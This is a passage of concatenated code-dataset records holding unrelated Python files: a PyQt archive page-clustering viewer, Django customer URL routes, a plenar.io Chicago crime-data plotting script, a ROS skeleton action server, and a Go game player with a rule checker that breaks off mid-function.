close(self):\n\t\tself._zf.close()\n\n\t@property\n\tdef path(self):\n\t\treturn self._path\n\n\t@property\n\tdef size(self):\n\t\treturn len(self._images)\n\n\t@cached_property\n\tdef aspect_ratio(self):\n\t\tr = []\n\t\tn = len(self._images)\n\t\tfor k in random.sample(range(n), min(n, 5)):\n\t\t\tpixmap = self.image(k)\n\t\t\tr.append(pixmap.width() / pixmap.height())\n\t\treturn np.median(r)\n\n\tdef image(self, index):\n\t\tname = self._images[index] + \".thumbnail.jpg\"\n\t\tim_bytes = self._zf.read(name)\n\t\tpixmap = QtGui.QPixmap()\n\t\tpixmap.loadFromData(im_bytes)\n\t\treturn pixmap\n\n\tdef name(self, index):\n\t\treturn self._images[index]\n\n\tdef sorted_by_density(self, indices):\n\t\tdensities = self._density[indices]\n\t\ts = np.argsort(densities)\n\t\treturn indices[s]\n\n\t@lru_cache(maxsize=2)\n\tdef cluster(self):\n\t\tprint(\"clustering... 
\", end=\"\", flush=True)\n\t\talgorithm = sklearn.cluster.AgglomerativeClustering(\n\t\t\tn_clusters=None, affinity=\"l1\", distance_threshold=25, linkage=\"single\")\n\t\twith Spinner():\n\t\t\tclustering = algorithm.fit(self._vectors)\n\t\tprint(\"\\bdone\", flush=True)\n\t\treturn clustering\n\n\tdef neighbor(self, anchor):\n\t\td, i = self._tree.query([self._vectors[anchor]], k=2, return_distance=True)\n\t\treturn d[0][-1], i[0][-1]\n\n\tdef neighborhood(self, anchor, distance):\n\t\treturn self._tree.query_radius([self._vectors[anchor]], r=distance)[0]\n\n\nclass TableModel(QtCore.QAbstractTableModel):\n\tCOLUMNS = 4\n\tTHUMBNAIL = 256\n\n\tdef __init__(self, archive, indices=None):\n\t\tsuper(TableModel, self).__init__()\n\n\t\tif indices is None:\n\t\t\tindices = np.arange(archive.size)\n\t\tindices = archive.sorted_by_density(indices)\n\n\t\tself._archive = archive\n\t\tself._indices = indices\n\n\t\tself._columns = TableModel.COLUMNS\n\t\tself._thumnail_size = TableModel.THUMBNAIL\n\n\tdef page_index(self, row, column):\n\t\tindex = row * self._columns + column\n\t\tif self._indices is not None:\n\t\t\treturn self._indices[index]\n\t\telse:\n\t\t\treturn index\n\n\tdef page_name(self, index0):\n\t\tindex = self._indices[index0]\n\t\treturn self._archive.name(index)\n\n\t@lru_cache(maxsize=64)\n\tdef page_image(self, index0):\n\t\tindex = self._indices[index0]\n\t\tpixmap = self._archive.image(index)\n\t\tpixmap = pixmap.scaled(QtCore.QSize(\n\t\t\tself._thumnail_size, self._thumnail_size),\n\t\t\tQtCore.Qt.KeepAspectRatio,\n\t\t\tQtCore.Qt.SmoothTransformation)\n\t\treturn pixmap\n\n\tdef data(self, index, role):\n\t\tif role == QtCore.Qt.ToolTipRole:\n\t\t\ti = index.row() * self._columns + index.column()\n\t\t\tif i < len(self._indices):\n\t\t\t\treturn self.page_name(i).split(\"/\", 1)[-1]\n\n\t\tif role == QtCore.Qt.DecorationRole:\n\t\t\ti = index.row() * self._columns + index.column()\n\t\t\tif i < len(self._indices):\n\t\t\t\treturn self.page_image(i)\n\n\tdef rowCount(self, index):\n\t\tn = len(self._indices)\n\t\tc = self._columns\n\t\trows = n // c\n\t\tif n % c > 0:\n\t\t\trows += 1\n\t\treturn rows\n\n\tdef columnCount(self, index):\n\t\treturn self._columns\n\n\nclass NeighborhoodWidget(QtWidgets.QWidget):\n\ton_exit = QtCore.Signal()\n\n\tdef __init__(self, archive, anchor, table, parent=None):\n\t\tsuper().__init__(parent)\n\n\t\tself._archive = archive\n\t\tself._anchor = anchor\n\t\tself._table = table\n\n\t\tself._next_d, _ = archive.neighbor(anchor)\n\n\t\tself.slider = QtWidgets.QSlider()\n\t\tself.slider.setOrientation(QtCore.Qt.Horizontal)\n\t\tself.slider.setTickPosition(QtWidgets.QSlider.TicksBelow)\n\t\tself.slider.setTickInterval(1)\n\t\tself.slider.setMinimum(0)\n\t\tself.slider.setMaximum(100)\n\t\tself.slider.setValue(10)\n\t\tself.slider.valueChanged.connect(self._distance_changed)\n\n\t\tself.label = QtWidgets.QLabel()\n\t\tself.label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)\n\n\t\tself._back_button = QtWidgets.QPushButton(\"back\")\n\t\tself._back_button.clicked.connect(lambda: self.on_exit.emit())\n\n\t\tlayout = QtWidgets.QHBoxLayout()\n\t\tlayout.addWidget(self.slider)\n\t\tlayout.addWidget(self._back_button)\n\n\t\tlayout_v = QtWidgets.QVBoxLayout()\n\t\tlayout_v.addLayout(layout)\n\t\tlayout_v.addWidget(self.label)\n\n\t\tself.setLayout(layout_v)\n\n\t\tself._update_model()\n\n\tdef _update_model(self):\n\t\td = self.slider.value()\n\t\tnhood = self._archive.neighborhood(self._anchor, d)\n\t\tself.label.setText(\"d=%d, found 
%d items, d1=%d.\" % (\n\t\t\td, len(nhood), self._next_d))\n\t\tself._model = TableModel(\n\t\t\tself._archive,\n\t\t\tnhood)\n\t\tself._table.setModel(self._model)\n\n\tdef _distance_changed(self):\n\t\tself._update_model()\n\n\nclass Mode(enum.Enum):\n\tCLUSTER = 1\n\tNEIGHBORHOOD = 2\n\n\ndef cluster_name(i):\n\tif i < 26:\n\t\treturn chr(ord(\"A\") + i)\n\telse:\n\t\treturn cluster_name(i // 26) + cluster_name(i % 26)\n\n\nclass ClusterSelector(QtWidgets.QWidget):\n\tdef __init__(self, table, archive, clustering, parent=None):\n\t\tsuper().__init__(parent)\n\n\t\tself._table = table\n\t\tself._model = None\n\n\t\tself._archive = archive\n\t\tself._labels = clustering.labels_.copy()\n\n\t\tself._clusters = [None]\n\t\tself._combo = QtWidgets.QComboBox()\n\t\tself._combo.addItem(\"all: %d pages\" % len(self._labels))\n\n\t\tlabels, counts = np.unique(self._labels, return_counts=True)\n\t\tcluster_index = 0\n\t\tcluttered = 0\n\t\tfor label, count in zip(labels, counts):\n\t\t\tif count < 5 or label < 0:\n\t\t\t\tself._labels[self._labels == label] = -1\n\t\t\t\tcluttered += count\n\t\t\t\tcontinue\n\n\t\t\tself._clusters.append(label)\n\t\t\tself._combo.addItem(\n\t\t\t\t\"cluster %s: %d pages\" % (cluster_name(cluster_index), count))\n\t\t\tcluster_index += 1\n\n\t\tif cluttered > 0:\n\t\t\tself._clusters.append(-1)\n\t\t\tself._combo.addItem(\"clutter: %d pages\" % cluttered)\n\n\t\tself._combo.currentIndexChanged.connect(self.switch_to_cluster)\n\t\tself.update_table()\n\n\t\tlayout = QtWidgets.QVBoxLayout()\n\t\tlayout.addWidget(self._combo)\n\t\tself.setLayout(layout)\n\n\tdef update_table(self):\n\t\tself.switch_to_cluster(self._combo.currentIndex())\n\n\tdef switch_to_cluster(self, index):\n\t\tlabel = self._clusters[index]\n\n\t\tif label is None:\n\t\t\tself._model = TableModel(self._archive)\n\t\telse:\n\t\t\tindices = np.nonzero(self._labels == label)[0]\n\t\t\tself._model = TableModel(self._archive, indices)\n\n\t\tself._table.setModel(self._model)\n\n\nclass Form(QtWidgets.QDialog):\n\tdef __init__(self, archive, parent=None):\n\t\tsuper().__init__(parent)\n\t\tself._archive = archive\n\t\tself.setWindowTitle(archive.path.name)\n\n\t\tself.table = QtWidgets.QTableView()\n\t\tself.model = None\n\t\tself.table.doubleClicked.connect(self.switch_to_neighborhood_view)\n\t\tself._mode = Mode.CLUSTER\n\n\t\tclustering = self._archive.cluster()\n\t\tself._csel = ClusterSelector(self.table, self._archive, clustering)\n\n\t\tself.table.setSizePolicy(\n\t\t\tQtWidgets.QSizePolicy.Minimum,\n\t\t\tQtWidgets.QSizePolicy.Minimum)\n\n\t\tratio = self._archive.aspect_ratio\n\n\t\thorizontal_header = self.table.horizontalHeader()\n\t\thorizontal_header.setSectionResizeMode(QtWidgets.QHeaderView.Fixed)\n\t\thorizontal_header.setDefaultSectionSize(TableModel.THUMBNAIL * ratio)\n\t\thorizontal_header.hide()\n\n\t\tvertical_header = self.table.verticalHeader()\n\t\tvertical_header.setSectionResizeMode(QtWidgets.QHeaderView.Fixed)\n\t\tvertical_header.setDefaultSectionSize(TableModel.THUMBNAIL)\n\t\tvertical_header.hide()\n\n\t\tmin_width = TableModel.THUMBNAIL * ratio * TableModel.COLUMNS\n\t\tself.table.setMinimumSize(min(min_width, 1280), 600)\n\n\t\tlayout = QtWidgets.QVBoxLayout()\n\t\tlayout.addWidget(self._csel)\n\t\tlayout.addWidget(self.table)\n\n\t\tself.setLayout(layout)\n\t\tself.layout = layout\n\n\tdef switch_to_cluster_view(self):\n\t\tif self._mode == Mode.CLUSTER:\n\t\t\treturn\n\t\tself._mode = Mode.CLUSTER\n\n\t\titem = 
self.layout.takeAt(0)\n\t\titem.widget().deleteLater()\n\n\t\tself._csel.show()\n\n\t\tself.model = None\n\t\tself.table.doubleClicked.connect(self.switch_to_neighborhood_view)\n\t\tself._csel.update_table()\n\n\tdef switch_to_neighborhood_view(self, index):\n\t\tif self._mode == Mode.NEIGHBORHOOD:\n\t\t\treturn\n\t\tself._mode = Mode.NEIGHBORHOOD\n\n\t\tself.table.doubleClicked.disconnect()\n\t\tself._csel.hide()\n\n\t\trow = index.row()\n\t\tcolumn = index.column()\n\t\tanchor = self.table.model().page_index(row, column)\n\n\t\twidget = NeighborhoodWidget(\n\t\t\tself._archive, anchor, self.table)\n\t\tself.layout.insertWidget(0, widget)\n\n\t\twidget.on_exit.connect(self.switch_to_cluster_view)\n\n\n@click.command()\n@click.argument(\n\t'archive_path',\n\ttype=click.Path(exists=True),\n\trequired=True)\n@Processor.options\ndef app(archive_path, **kwargs):\n\t\"\"\" Cluster pages in given archive. \"\"\"\n\tapp = QtWidgets.QApplication(sys.argv)\n\n\tarchive = Archive(Path(archive_path))\n\n\ttry:\n\t\tform = Form(archive)\n\t\tform.show()\n\n\t\tret = app.exec_()\n\tfinally:\n\t\tarchive.close()\n\n\tsys.exit(ret)\n\n\nif __name__ == \"__main__\":\n\tapp()\n","sub_path":"origami/tool/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":9732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"550104141","text":"from django.urls import path\nfrom .views import customer_list, customer_detail, customer_search\n\n# NOTE: the URL converter patterns (the '<...>' parts) were stripped during extraction;\n# the converter names below are plausible reconstructions, not the originals.\nurlpatterns = [\n    path('', customer_list, name='custs'),\n    path('<int:pk>/', customer_detail, name='cust'),\n    path('<int:pk>/cases/page<int:page>/files/page<int:file_page>/', customer_detail, name='cust'),\n    path('page<int:page>/', customer_list, name='custs'),\n    path('search/<str:query>/', customer_search),\n]\n","sub_path":"medius/customers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"433663173","text":"__author__ = 'bohe'\n\nimport requests, json\nimport matplotlib.pylab as plt\nfrom datetime import datetime\n\n# the initial frame work is to ensure that data can be crawled from the website\n# using the provided API, in this case, in a JSON format.\nurl_link = 'http://plenar.io/v1/api/detail-aggregate/?dataset_name=crimes_2001_to_present&obs_date__ge=2001-01-01&iucr=0110&arrest=yes&agg=month'\nr = requests.get(url_link)\ndataJSON = r.json()\n\nmainKeys = dataJSON.keys()\nprint(mainKeys)\n\n\nobjData = dataJSON.get(\"objects\")\nprint(len(objData))\nprint(objData[1].keys())\n\ncount = []\ntimedate = []\n\n\nfor item in objData:\n    count.append(item.get('count') )\n    timeSplits = datetime.strptime( item.get('datetime'), '%Y-%m-%dT%H:%M:%S' )\n    temp = timeSplits.year + timeSplits.month/13.0\n    timedate.append(temp)\n\n# Create a figure of size 8x6 inches, 80 dots per inch\nplt.figure(figsize=(5, 3), dpi=80)\nplt.subplot(1, 1, 1)\nplt.scatter(timedate, count, color=\"blue\")\nplt.xlim(2000, 2015)\nplt.show()\n# savefig(\"exercice_2.png\", dpi=72)\n","sub_path":"ChicagoCrimeDate.py","file_name":"ChicagoCrimeDate.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"449255874","text":"#! 
/usr/bin/env python\n\nimport sys\nimport rospy\nimport actionlib\n\nfrom skeleton_publisher import SkeletonManager\nfrom skeleton_tracker.msg import skeletonAction, skeletonActionResult\n\n\nclass skeleton_server(object):\n def __init__(self):\n # Start server\n rospy.loginfo(\"Skeleton Publisher starting an action server\")\n\n self._as = actionlib.SimpleActionServer(\"skeleton_action\", skeletonAction, \\\n execute_cb=self.execute_cb, auto_start=False)\n self._as.start()\n\n def cond(self):\n return self._as.is_preempt_requested()\n\n def execute_cb(self, goal):\n sk_manager = SkeletonManager()\n if not self.cond(): \n sk_manager.publish_skeleton()\n\n\t #Split on multiple methods to allow system to stop the action server\n self._as.set_succeeded(skeletonActionResult())\n\n\nif __name__ == \"__main__\":\n rospy.init_node('skeleton_action_server')\n \n skeleton_server()\n rospy.spin()\n","sub_path":"scripts/skeleton_action.py","file_name":"skeleton_action.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"423255563","text":"import queue as Queue\nimport copy\n\nclass GoPlayerMin():\n\tdef __init__(self, player_name=None, player_stone=None, board_size=None):\n\t\t\"\"\"\n\t\tThis class implements a Go Player component that will make\n\t\ta legal move as a given stone given the board's history.\n\n\t\tIt will internally store the player name, player stone, and have\n\t\toperations to check that legal moves are valid. In the case that it is valid\n\t\tthe player will play at the legal smallest col index primarily and\n\t\tlegal smallest row index primarily. If there are no legal moves, it will\n\t\tpass. If the history is invalid, it will reply with \"This history makes no sense!\".\n\n\t\tIf there are two consecutive passes, the player is given the score and the winner\n\t\tof the game.\n\t\t\"\"\"\n\t\tself.player_name = \"no name\" if player_name is None else player_name\n\t\tself.player_stone = \"B\" if player_stone is None else player_stone\n\t\tself.board_size = 19 if board_size is None else board_size\n\t\tself.rules = GoBoard(self.board_size)\n\n\n\n\t################################\n\t# GAMEPLAY RESPONSES\n\t################################\n\n\t# Returns appropriate responses given valid input\n\tdef get_response(self, input):\n\t\tif ((len(input) == 1) and (input == [\"register\"])):\n\t\t\treturn self.register()\n\t\telif ((len(input) == 2) and (input[0] == \"receive-stones\") and ((input[1] == \"B\") or (input[1] == \"W\"))):\n\t\t\tself.receive_stone(input[1])\n\t\telif ((len(input) == 2) and (input[0] == \"make-a-move\") and ((len(input[1]) == 1) or (len(input[1]) == 2) or (len(input[1]) == 3))):\n\t\t\treturn self.make_move(input[1])\n\t\telse:\n\t\t\traise Exception(\"Invalid input has no appropriate response\")\n\n\t# Internally stores player name, default \"no name\"\n\tdef register(self):\n\t\treturn self.player_name\n\n\t# Initiates game, assigns player a stone and clears previous game board\n\tdef receive_stone(self, stone):\n\t\tself.player_stone = stone\n\n\t# Update go_board state if board history is valid\n\tdef make_move(self, boards_arr):\n\t\tif (self.rules.validate_history(self.player_stone, boards_arr)):\n\t\t\treturn self.find_move(self.player_stone, boards_arr[0], boards_arr)\n\t\telse:\n\t\t\treturn \"This history makes no sense!\"\n\n\t# Finds first valid move in a min col, row coordinate, otherwise \"pass\"\n\tdef find_move(self, stone, board, 
history):\n\t\tfor row in range(self.board_size):\n\t\t\tfor col in range(self.board_size):\n\t\t\t\ttry_place = board\n\t\t\t\tif (board[col][row] == \" \"):\n\t\t\t\t\ttry_place = self.rules.place(stone, (col, row), history[0])\n\t\t\t\t\tvisited = [ [False] * self.board_size for row in range(self.board_size) ]\n\t\t\t\t\tneighbors = self.rules.find_neighbors((col, row))\n\t\t\t\t\tq = Queue.Queue()\n\t\t\t\t\tfor n in neighbors:\n\t\t\t\t\t\tif ((try_place[n[0]][n[1]] != stone) and (not self.rules.reachable(n, \" \", try_place))):\n\t\t\t\t\t\t\tvisited[n[0]][n[1]] = True\n\t\t\t\t\t\t\tq.put(n)\n\n\t\t\t\t\twhile (q.empty() != True):\n\t\t\t\t\t\tcheck_point = q.get()\n\t\t\t\t\t\ttry_place = self.rules.remove(try_place[check_point[0]][check_point[1]], check_point, try_place)\n\t\t\t\t\t\tn_neighbors = self.rules.find_neighbors(check_point)\n\t\t\t\t\t\tfor n in n_neighbors:\n\t\t\t\t\t\t\tif ((try_place[n[0]][n[1]] == self.rules.get_opponent(stone)) and (not visited[n[0]][n[1]])):\n\t\t\t\t\t\t\t\tvisited[n[0]][n[1]] = True\n\t\t\t\t\t\t\t\tq.put(n)\n\n\t\t\t\t\tif (len(history) == 3):\n\t\t\t\t\t\tif (try_place != history[1]):\n\t\t\t\t\t\t\tif (self.rules.reachable((col, row), \" \", try_place)):\n\t\t\t\t\t\t\t\treturn self.rules.idx_to_point(row, col)\n\n\t\t\t\t\tif (len(history) != 3):\n\t\t\t\t\t\tif (self.rules.reachable((col, row), \" \", try_place)):\n\t\t\t\t\t\t\t\treturn self.rules.idx_to_point(row, col)\n\n\t\treturn \"pass\"\n\t\n\n\nclass GoBoard():\n\tdef __init__(self, board_size=None):\n\t\t\"\"\"\n\t\tThis class implements a Go board component that returns a response\n\t\tbased on a statement executed on a given 19 x 19 Go board. The\n\t\tstatements are as follows:\n\n\t\tQuery Statements:\n\t\t\t[\"occupied?\", Point] - returns True if a Stone at point, else False\n\t\t\t[\"occupies?\", Stone, Point] - returns True if stone at point, else False\n\t\t\t[\"reachable?\", Point, MaybeStone] - returns True if exists path of vertical\n\t\t\t\t\t\tor horizontal adjacent points of same Stone from Stone at Point to\n\t\t\t\t\t\tMaybestone, else False. Implemented BFS with queue\n\n\t\tCommand Statements:\n\t\t\t[\"place\", Stone, Point] - returns updated Board with Stone at Point,\n\t\t\t\t\t\terror if invalid move \"This seat is taken!\"\n\t\t\t[\"remove\", Stone, Point] - returns updated Board with Stone removed from\n\t\t\t\t\t\tPoint, error if invalid \"I am just a board! 
I cannot remove\n\t\t\t\t\t\twhat is not there!\"\n\t\t\t[\"get-points\", MaybeStone] - returns array of Points that has stored all\n\t\t\t\t\t\tPoint positions of the given MaybeStone input in the Go board,\n\t\t\t\t\t\tsorted in increasing lexicographic order.\n\t\t\"\"\"\n\t\tself.board_size = 19 if board_size is None else board_size\n\n\n\t###############################\n\t# BOARD RESPONSES\n\t###############################\n\n\t# Returns appropriate response given a valid input form\n\tdef get_response(self, input):\n\t\tif (len(input) == self.board_size):\n\t\t\treturn self.get_score(input)\n\t\telif ((len(input) == 2) and (input[1] == \"pass\")):\n\t\t\treturn self.pass_turn(input[0])\n\t\telif (len(input) == 2):\n\t\t\treturn self.get_validity(input[0], self.point_to_idx(input[1][0]), input[1][1])\n\t\telse:\n\t\t\traise Exception(\"Invalid input has no appropriate response\")\n\n\t# Returns the score of \"B\" and \"W\" given a final board state.\n\tdef get_score(self, board):\n\t\tblack_area = len(self.get_points(\"B\", board))\n\t\twhite_area = len(self.get_points(\"W\", board))\n\t\tneutral = 0\n\n\t\tall_empty = self.get_points(\" \", board)\n\t\tfor intersection in all_empty:\n\t\t\tpoint = self.point_to_idx(intersection)\n\t\t\tif ((not self.reachable(point, \"W\", board)) and (not self.reachable(point, \"B\", board))):\n\t\t\t\tneutral += 1\n\t\t\telif (not self.reachable(point, \"W\", board)):\n\t\t\t\tblack_area += 1\n\t\t\telif (not self.reachable(point, \"B\", board)):\n\t\t\t\twhite_area += 1\n\t\t\telse:\n\t\t\t\tneutral += 1\n\n\t\tif ((black_area + white_area + neutral) == (self.board_size * self.board_size)):\n\t\t\treturn {\"B\": black_area, \"W\": white_area}\n\t\telse:\n\t\t\traise Exception(\"Invalid scoring, sum of black, white, and neutral must be intersection total.\")\n\n\n\n\t###############################\n\t# RULE CHECKER INVARIANTS\n\t###############################\n\t\"\"\"\n\t1. Go is a game between two players, called Black and White.\n\t2. Go is played on a plane grid of horizontal and vertical lines, called a board.\n\t\t - Points on the board are intersections between lines.\n\t\t - Points are adjacent if they are distinct and connected by a line\n\t\t with no other intersections between them.\n\t3. Go is played with tokens know as stones. Each player has at their\n\t\tdisposal an adequate supply of their color stone.\n\t4. \tAt any time in the game, each intersection may only be Empty,\n\t\toccupied by white or occupied by black stone.\n\t5.\tAt the beginning of the game, the board is empty.\n\t6.\tBlack moves first, the player then alternate moves.\n\t7.\tMoves are either \"pass\" or Play.\n\t\t- Can only play at empty intersections.\n\t\t- Can only play if stone will still have liberties after play.\n\t\t- Liberties counted by chained stones.\n\t\t- Stones without liberties after play are removed from board.\n\t8. A Play is illegal if it would repeat a previously played position (Ko).\n\t9. The game ends when both players have pass consecutive.\n\t10. 
The player with the higher score wins, otherwise drawn game.\n\t\"\"\"\n\n\t# Validates history only, independent of requested move\n\tdef validate_history(self, stone, boards_arr):\n\n\t\t# Board history len 1 means just started, board is empty, black to move\n\t\tif (len(boards_arr) == 1):\n\t\t\tif (stone != \"B\"):\n\t\t\t\treturn False\n\t\t\tif (len(self.get_points(\" \", boards_arr[0])) != (self.board_size * self.board_size)):\n\t\t\t\treturn False\n\n\t\t# Board history len 2, first is empty board, black moved once, it's white's turn\n\t\telif (len(boards_arr) == 2):\n\t\t\tif (stone != \"W\"):\n\t\t\t\treturn False\n\t\t\tif ((len(self.get_points(\"B\", boards_arr[0])) > 1) or (len(self.get_points(\"W\", boards_arr[0])) != 0)):\n\t\t\t\treturn False\n\t\t\tif (len(self.get_points(\" \", boards_arr[1])) != (self.board_size * self.board_size)):\n\t\t\t\treturn False\n\n\t\t# Board history len 3\n\t\telif (len(boards_arr) == 3):\n\n\t\t\t# Check board history for Ko rule\n\t\t\tif (boards_arr[0] == boards_arr[2]):\n\t\t\t\treturn False\n\n\t\t\t# Check game over because 2 consecutive passes\n\t\t\tif ((boards_arr[0] == boards_arr[1]) and (boards_arr[0] == boards_arr[2])):\n\t\t\t\treturn False\n\t\t\tif ((boards_arr[1] == boards_arr[2]) and (len (self.get_points(\" \", boards_arr[1])) == (self.board_size * self.board_size)) and (len (self.get_points(\" \", boards_arr[2])) == (self.board_size * self. board_size)) and (len (self.get_points(\"W\", boards_arr[0])) != 1)):\n\t\t\t\treturn False\n\n\t\t\t# Check Board history contains no dead stones\n\t\t\tif ((not self.check_dead_removed(boards_arr[0])) or (not self.check_dead_removed(boards_arr[1])) or (not self.check_dead_removed(boards_arr[2]))):\n\t\t\t\treturn False\n\n\t\t\t# Check that players are alternating plays between \"B\" and \"W\"\n\t\t\tif (not self.get_player_order(boards_arr[0], boards_arr[1], boards_arr[2], stone)):\n\t\t\t\treturn False\n\n\t\t\t# Check Board history contains only valid moves\n\t\t\tif ((not self.get_move_validity(boards_arr[2], boards_arr[1])) or (not self.get_move_validity(boards_arr[1], boards_arr[0]))):\n\t\t\t\treturn False\n\n\t\telse:\n\t\t\traise Exception(\"Board history length should be 1 to 3.\")\n\n\t\treturn True\n\n\n\t# Returns the validity of a Move given a [Stone, [Point, Boards]] valid input w/ board history\n\tdef get_validity(self, stone, point, boards_arr):\n\n\t\t# Board history len 1 means just started, board is empty, black to move\n\t\tif (len(boards_arr) == 1):\n\t\t\tif (stone != \"B\"):\n\t\t\t\treturn False\n\n\t\t\tif (len(self.get_points(\" \", boards_arr[0])) != (self.board_size * self.board_size)):\n\t\t\t\treturn False\n\n\t\t# Board history len 2, first is empty board, black moved once, it's white's turn\n\t\telif (len(boards_arr) == 2):\n\t\t\tif (stone != \"W\"):\n\t\t\t\treturn False\n\t\t\tif ((len(self.get_points(\"B\", boards_arr[0])) > 1) or (len(self.get_points(\"W\", boards_arr[0])) != 0)):\n\t\t\t\treturn False\n\t\t\tif (len(self.get_points(\" \", boards_arr[1])) != (self.board_size * self.board_size)):\n\t\t\t\treturn False\n\n\t\t\t# Check if requested play is valid\n\t\t\ttry_place = self.place(stone, point, boards_arr[0])\n\t\t\tif (try_place == \"This seat is taken!\"):\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tif ((not self.get_move_validity(boards_arr[0], try_place))):\n\t\t\t\t\treturn False\n\n\t\t# Board history len 3, check moves valid between them, check current move\n\t\telif (len(boards_arr) == 
3):\n\n\t\t\t################################\n\t\t\t# Check board history\n\t\t\t################################\n\n\t\t\t# Check board history for Ko rule\n\t\t\tif (boards_arr[0] == boards_arr[2]):\n\t\t\t\treturn False\n\n\t\t\t# Check game over because 2 consecutive passes\n\t\t\tif ((boards_arr[0] == boards_arr[1]) and (boards_arr[0] == boards_arr[2])):\n\t\t\t\treturn False\n\t\t\tif ((boards_arr[1] == boards_arr[2]) and (len (self.get_points(\" \", boards_arr[1])) == (self.board_size * self.board_size)) and (len (self.get_points(\" \", boards_arr[2])) == (self.board_size * self. board_size)) and (len (self.get_points(\"W\", boards_arr[0])) != 1)):\n\t\t\t\treturn False\n\n\t\t\t# Check Board history contains no dead stones\n\t\t\tif ((not self.check_dead_removed(boards_arr[0])) or (not self.check_dead_removed(boards_arr[1])) or (not self.check_dead_removed(boards_arr[2]))):\n\t\t\t\treturn False\n\n\t\t\t# Check that players are alternating plays between \"B\" and \"W\"\n\t\t\tif (not self.get_player_order(boards_arr[0], boards_arr[1], boards_arr[2], stone)):\n\t\t\t\treturn False\n\n\t\t\t# Check Board history contains only valid moves\n\t\t\tif ((not self.get_move_validity(boards_arr[2], boards_arr[1])) or (not self.get_move_validity(boards_arr[1], boards_arr[0]))):\n\t\t\t\treturn False\n\n\n\t\t\t#############################\n\t\t\t# Check move against history\n\t\t\t#############################\n\n\t\t\ttry_place = self.place(stone, point, boards_arr[0])\n\n\t\t\tif (try_place == \"This seat is taken!\"):\n\t\t\t\treturn False\n\t\t\telif (not self.reachable(point, \" \", try_place)):\n\t\t\t\tvisited = [ [False] * self.board_size for row in range(self.board_size) ]\n\t\t\t\tneighbors = self.find_neighbors(point)\n\n\t\t\t\tq = Queue.Queue()\n\t\t\t\tfor n in neighbors:\n\t\t\t\t\tif ((try_place[n[0]][n[1]] != stone) and (not self.reachable(n, \" \", try_place))):\n\t\t\t\t\t\tq.put(n)\n\n\t\t\t\twhile (q.empty() != True):\n\t\t\t\t\tcheck_point = q.get()\n\t\t\t\t\ttry_place = self.remove(try_place[check_point[0]][check_point[1]], check_point, try_place)\n\t\t\t\t\tn_neighbors = self.find_neighbors(check_point)\n\t\t\t\t\tfor n in n_neighbors:\n\t\t\t\t\t\tif ((try_place[n[0]][n[1]] == try_place[check_point[0]][check_point[1]]) and (not visited[check_point[0]][check_point[1]])):\n\t\t\t\t\t\t\tvisited[check_point[0]][check_point[1]] = True\n\t\t\t\t\t\t\tq.put(n)\n\n\t\t\t\tif (not self.reachable(point, \" \", try_place)):\n\t\t\t\t\treturn False\n\n\t\t\t\tif (not self.get_move_validity(boards_arr[0],try_place)):\n\t\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tif (not self.get_move_validity(boards_arr[0],try_place)):\n\t\t\t\t\treturn False\n\n\t\t\t# Check that requested move doesn't violate Ko rule\n\t\t\tif (boards_arr[1] == try_place):\n\t\t\t\treturn False\n\n\t\telse:\n\t\t\traise Exception(\"Board history length should be 1 to 3.\")\n\n\t\treturn True\n\n\t# Check that a move is valid between previous and current board\n\tdef get_move_validity(self, prev_board, curr_board):\n\n\t\t# Get all the difference between state\n\t\tplaced = []\n\t\tremoved = []\n\t\tdead_removed = []\n\n\t\tfor row in range(self.board_size):\n\t\t\tfor col in range(self.board_size):\n\t\t\t\tif (prev_board[row][col] != curr_board[row][col]):\n\t\t\t\t\tif (prev_board[row][col] == \" \"):\n\t\t\t\t\t\tplaced.append([curr_board[row][col], (row, col)])\n\t\t\t\t\telif ((prev_board[row][col] == \"B\") and (curr_board[row][col] == \" \")):\n\t\t\t\t\t\tremoved.append([prev_board[row][col], (row, 
col)])\n\t\t\t\t\telif ((prev_board[row][col] == \"W\") and (curr_board[row][col] == \" \")):\n\t\t\t\t\t\tremoved.append([prev_board[row][col], (row, col)])\n\t\t\t\t\t# Unexplained changes in board state\n\t\t\t\t\telif ((prev_board[row][col] == \"B\") and (curr_board[row][col] == \"W\")):\n\t\t\t\t\t\treturn False\n\t\t\t\t\telif ((prev_board[row][col] == \"W\") and (curr_board[row][col] == \"B\")):\n\t\t\t\t\t\treturn False\n\n\t\t# Move was a pass, boards should be identical\n\t\tif (len(placed) == 0):\n\t\t\tif (len(removed) != 0):\n\t\t\t\treturn False\n\t\t\tif (prev_board != curr_board):\n\t\t\t\treturn False\n\n\t\t# Check if place on board has liberties, and for removed dead stones\n\t\tif (len(placed) == 1):\n\t\t\ttry_place = self.place(placed[0][0], placed[0][1], prev_board)\n\t\t\tif (try_place == \"This seat is taken!\"):\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\t#dup_try_place = copy.deepcopy(try_place)\n\t\t\t\twhite_b4 = len(self.get_points(\"W\", prev_board))\n\t\t\t\tblack_b4 = len(self.get_points(\"B\", prev_board))\n\t\t\t\tstone = placed[0][0]\n\n\t\t\t\tvisited = [ [False] * self.board_size for row in range(self.board_size) ]\n\t\t\t\tneighbors = self.find_neighbors(placed[0][1])\n\t\t\t\tq = Queue.Queue()\n\t\t\t\tfor n in neighbors:\n\t\t\t\t\tif ((try_place[n[0]][n[1]] == self.get_opponent(stone)) and (not self.reachable(n, \" \", try_place))):\n\t\t\t\t\t\tvisited[n[0]][n[1]] = True\n\t\t\t\t\t\tq.put(n)\n\n\t\t\t\twhile (q.empty() != True):\n\t\t\t\t\tcheck_point = q.get()\n\t\t\t\t\tdead_removed.append([try_place[check_point[0]][check_point[1]], check_point])\n\t\t\t\t\ttry_place = self.remove(try_place[check_point[0]][check_point[1]], check_point, try_place)\n\t\t\t\t\tn_neighbors = self.find_neighbors(check_point)\n\t\t\t\t\tfor n in n_neighbors:\n\t\t\t\t\t\tif ((try_place[n[0]][n[1]] == self.get_opponent(stone)) and (not 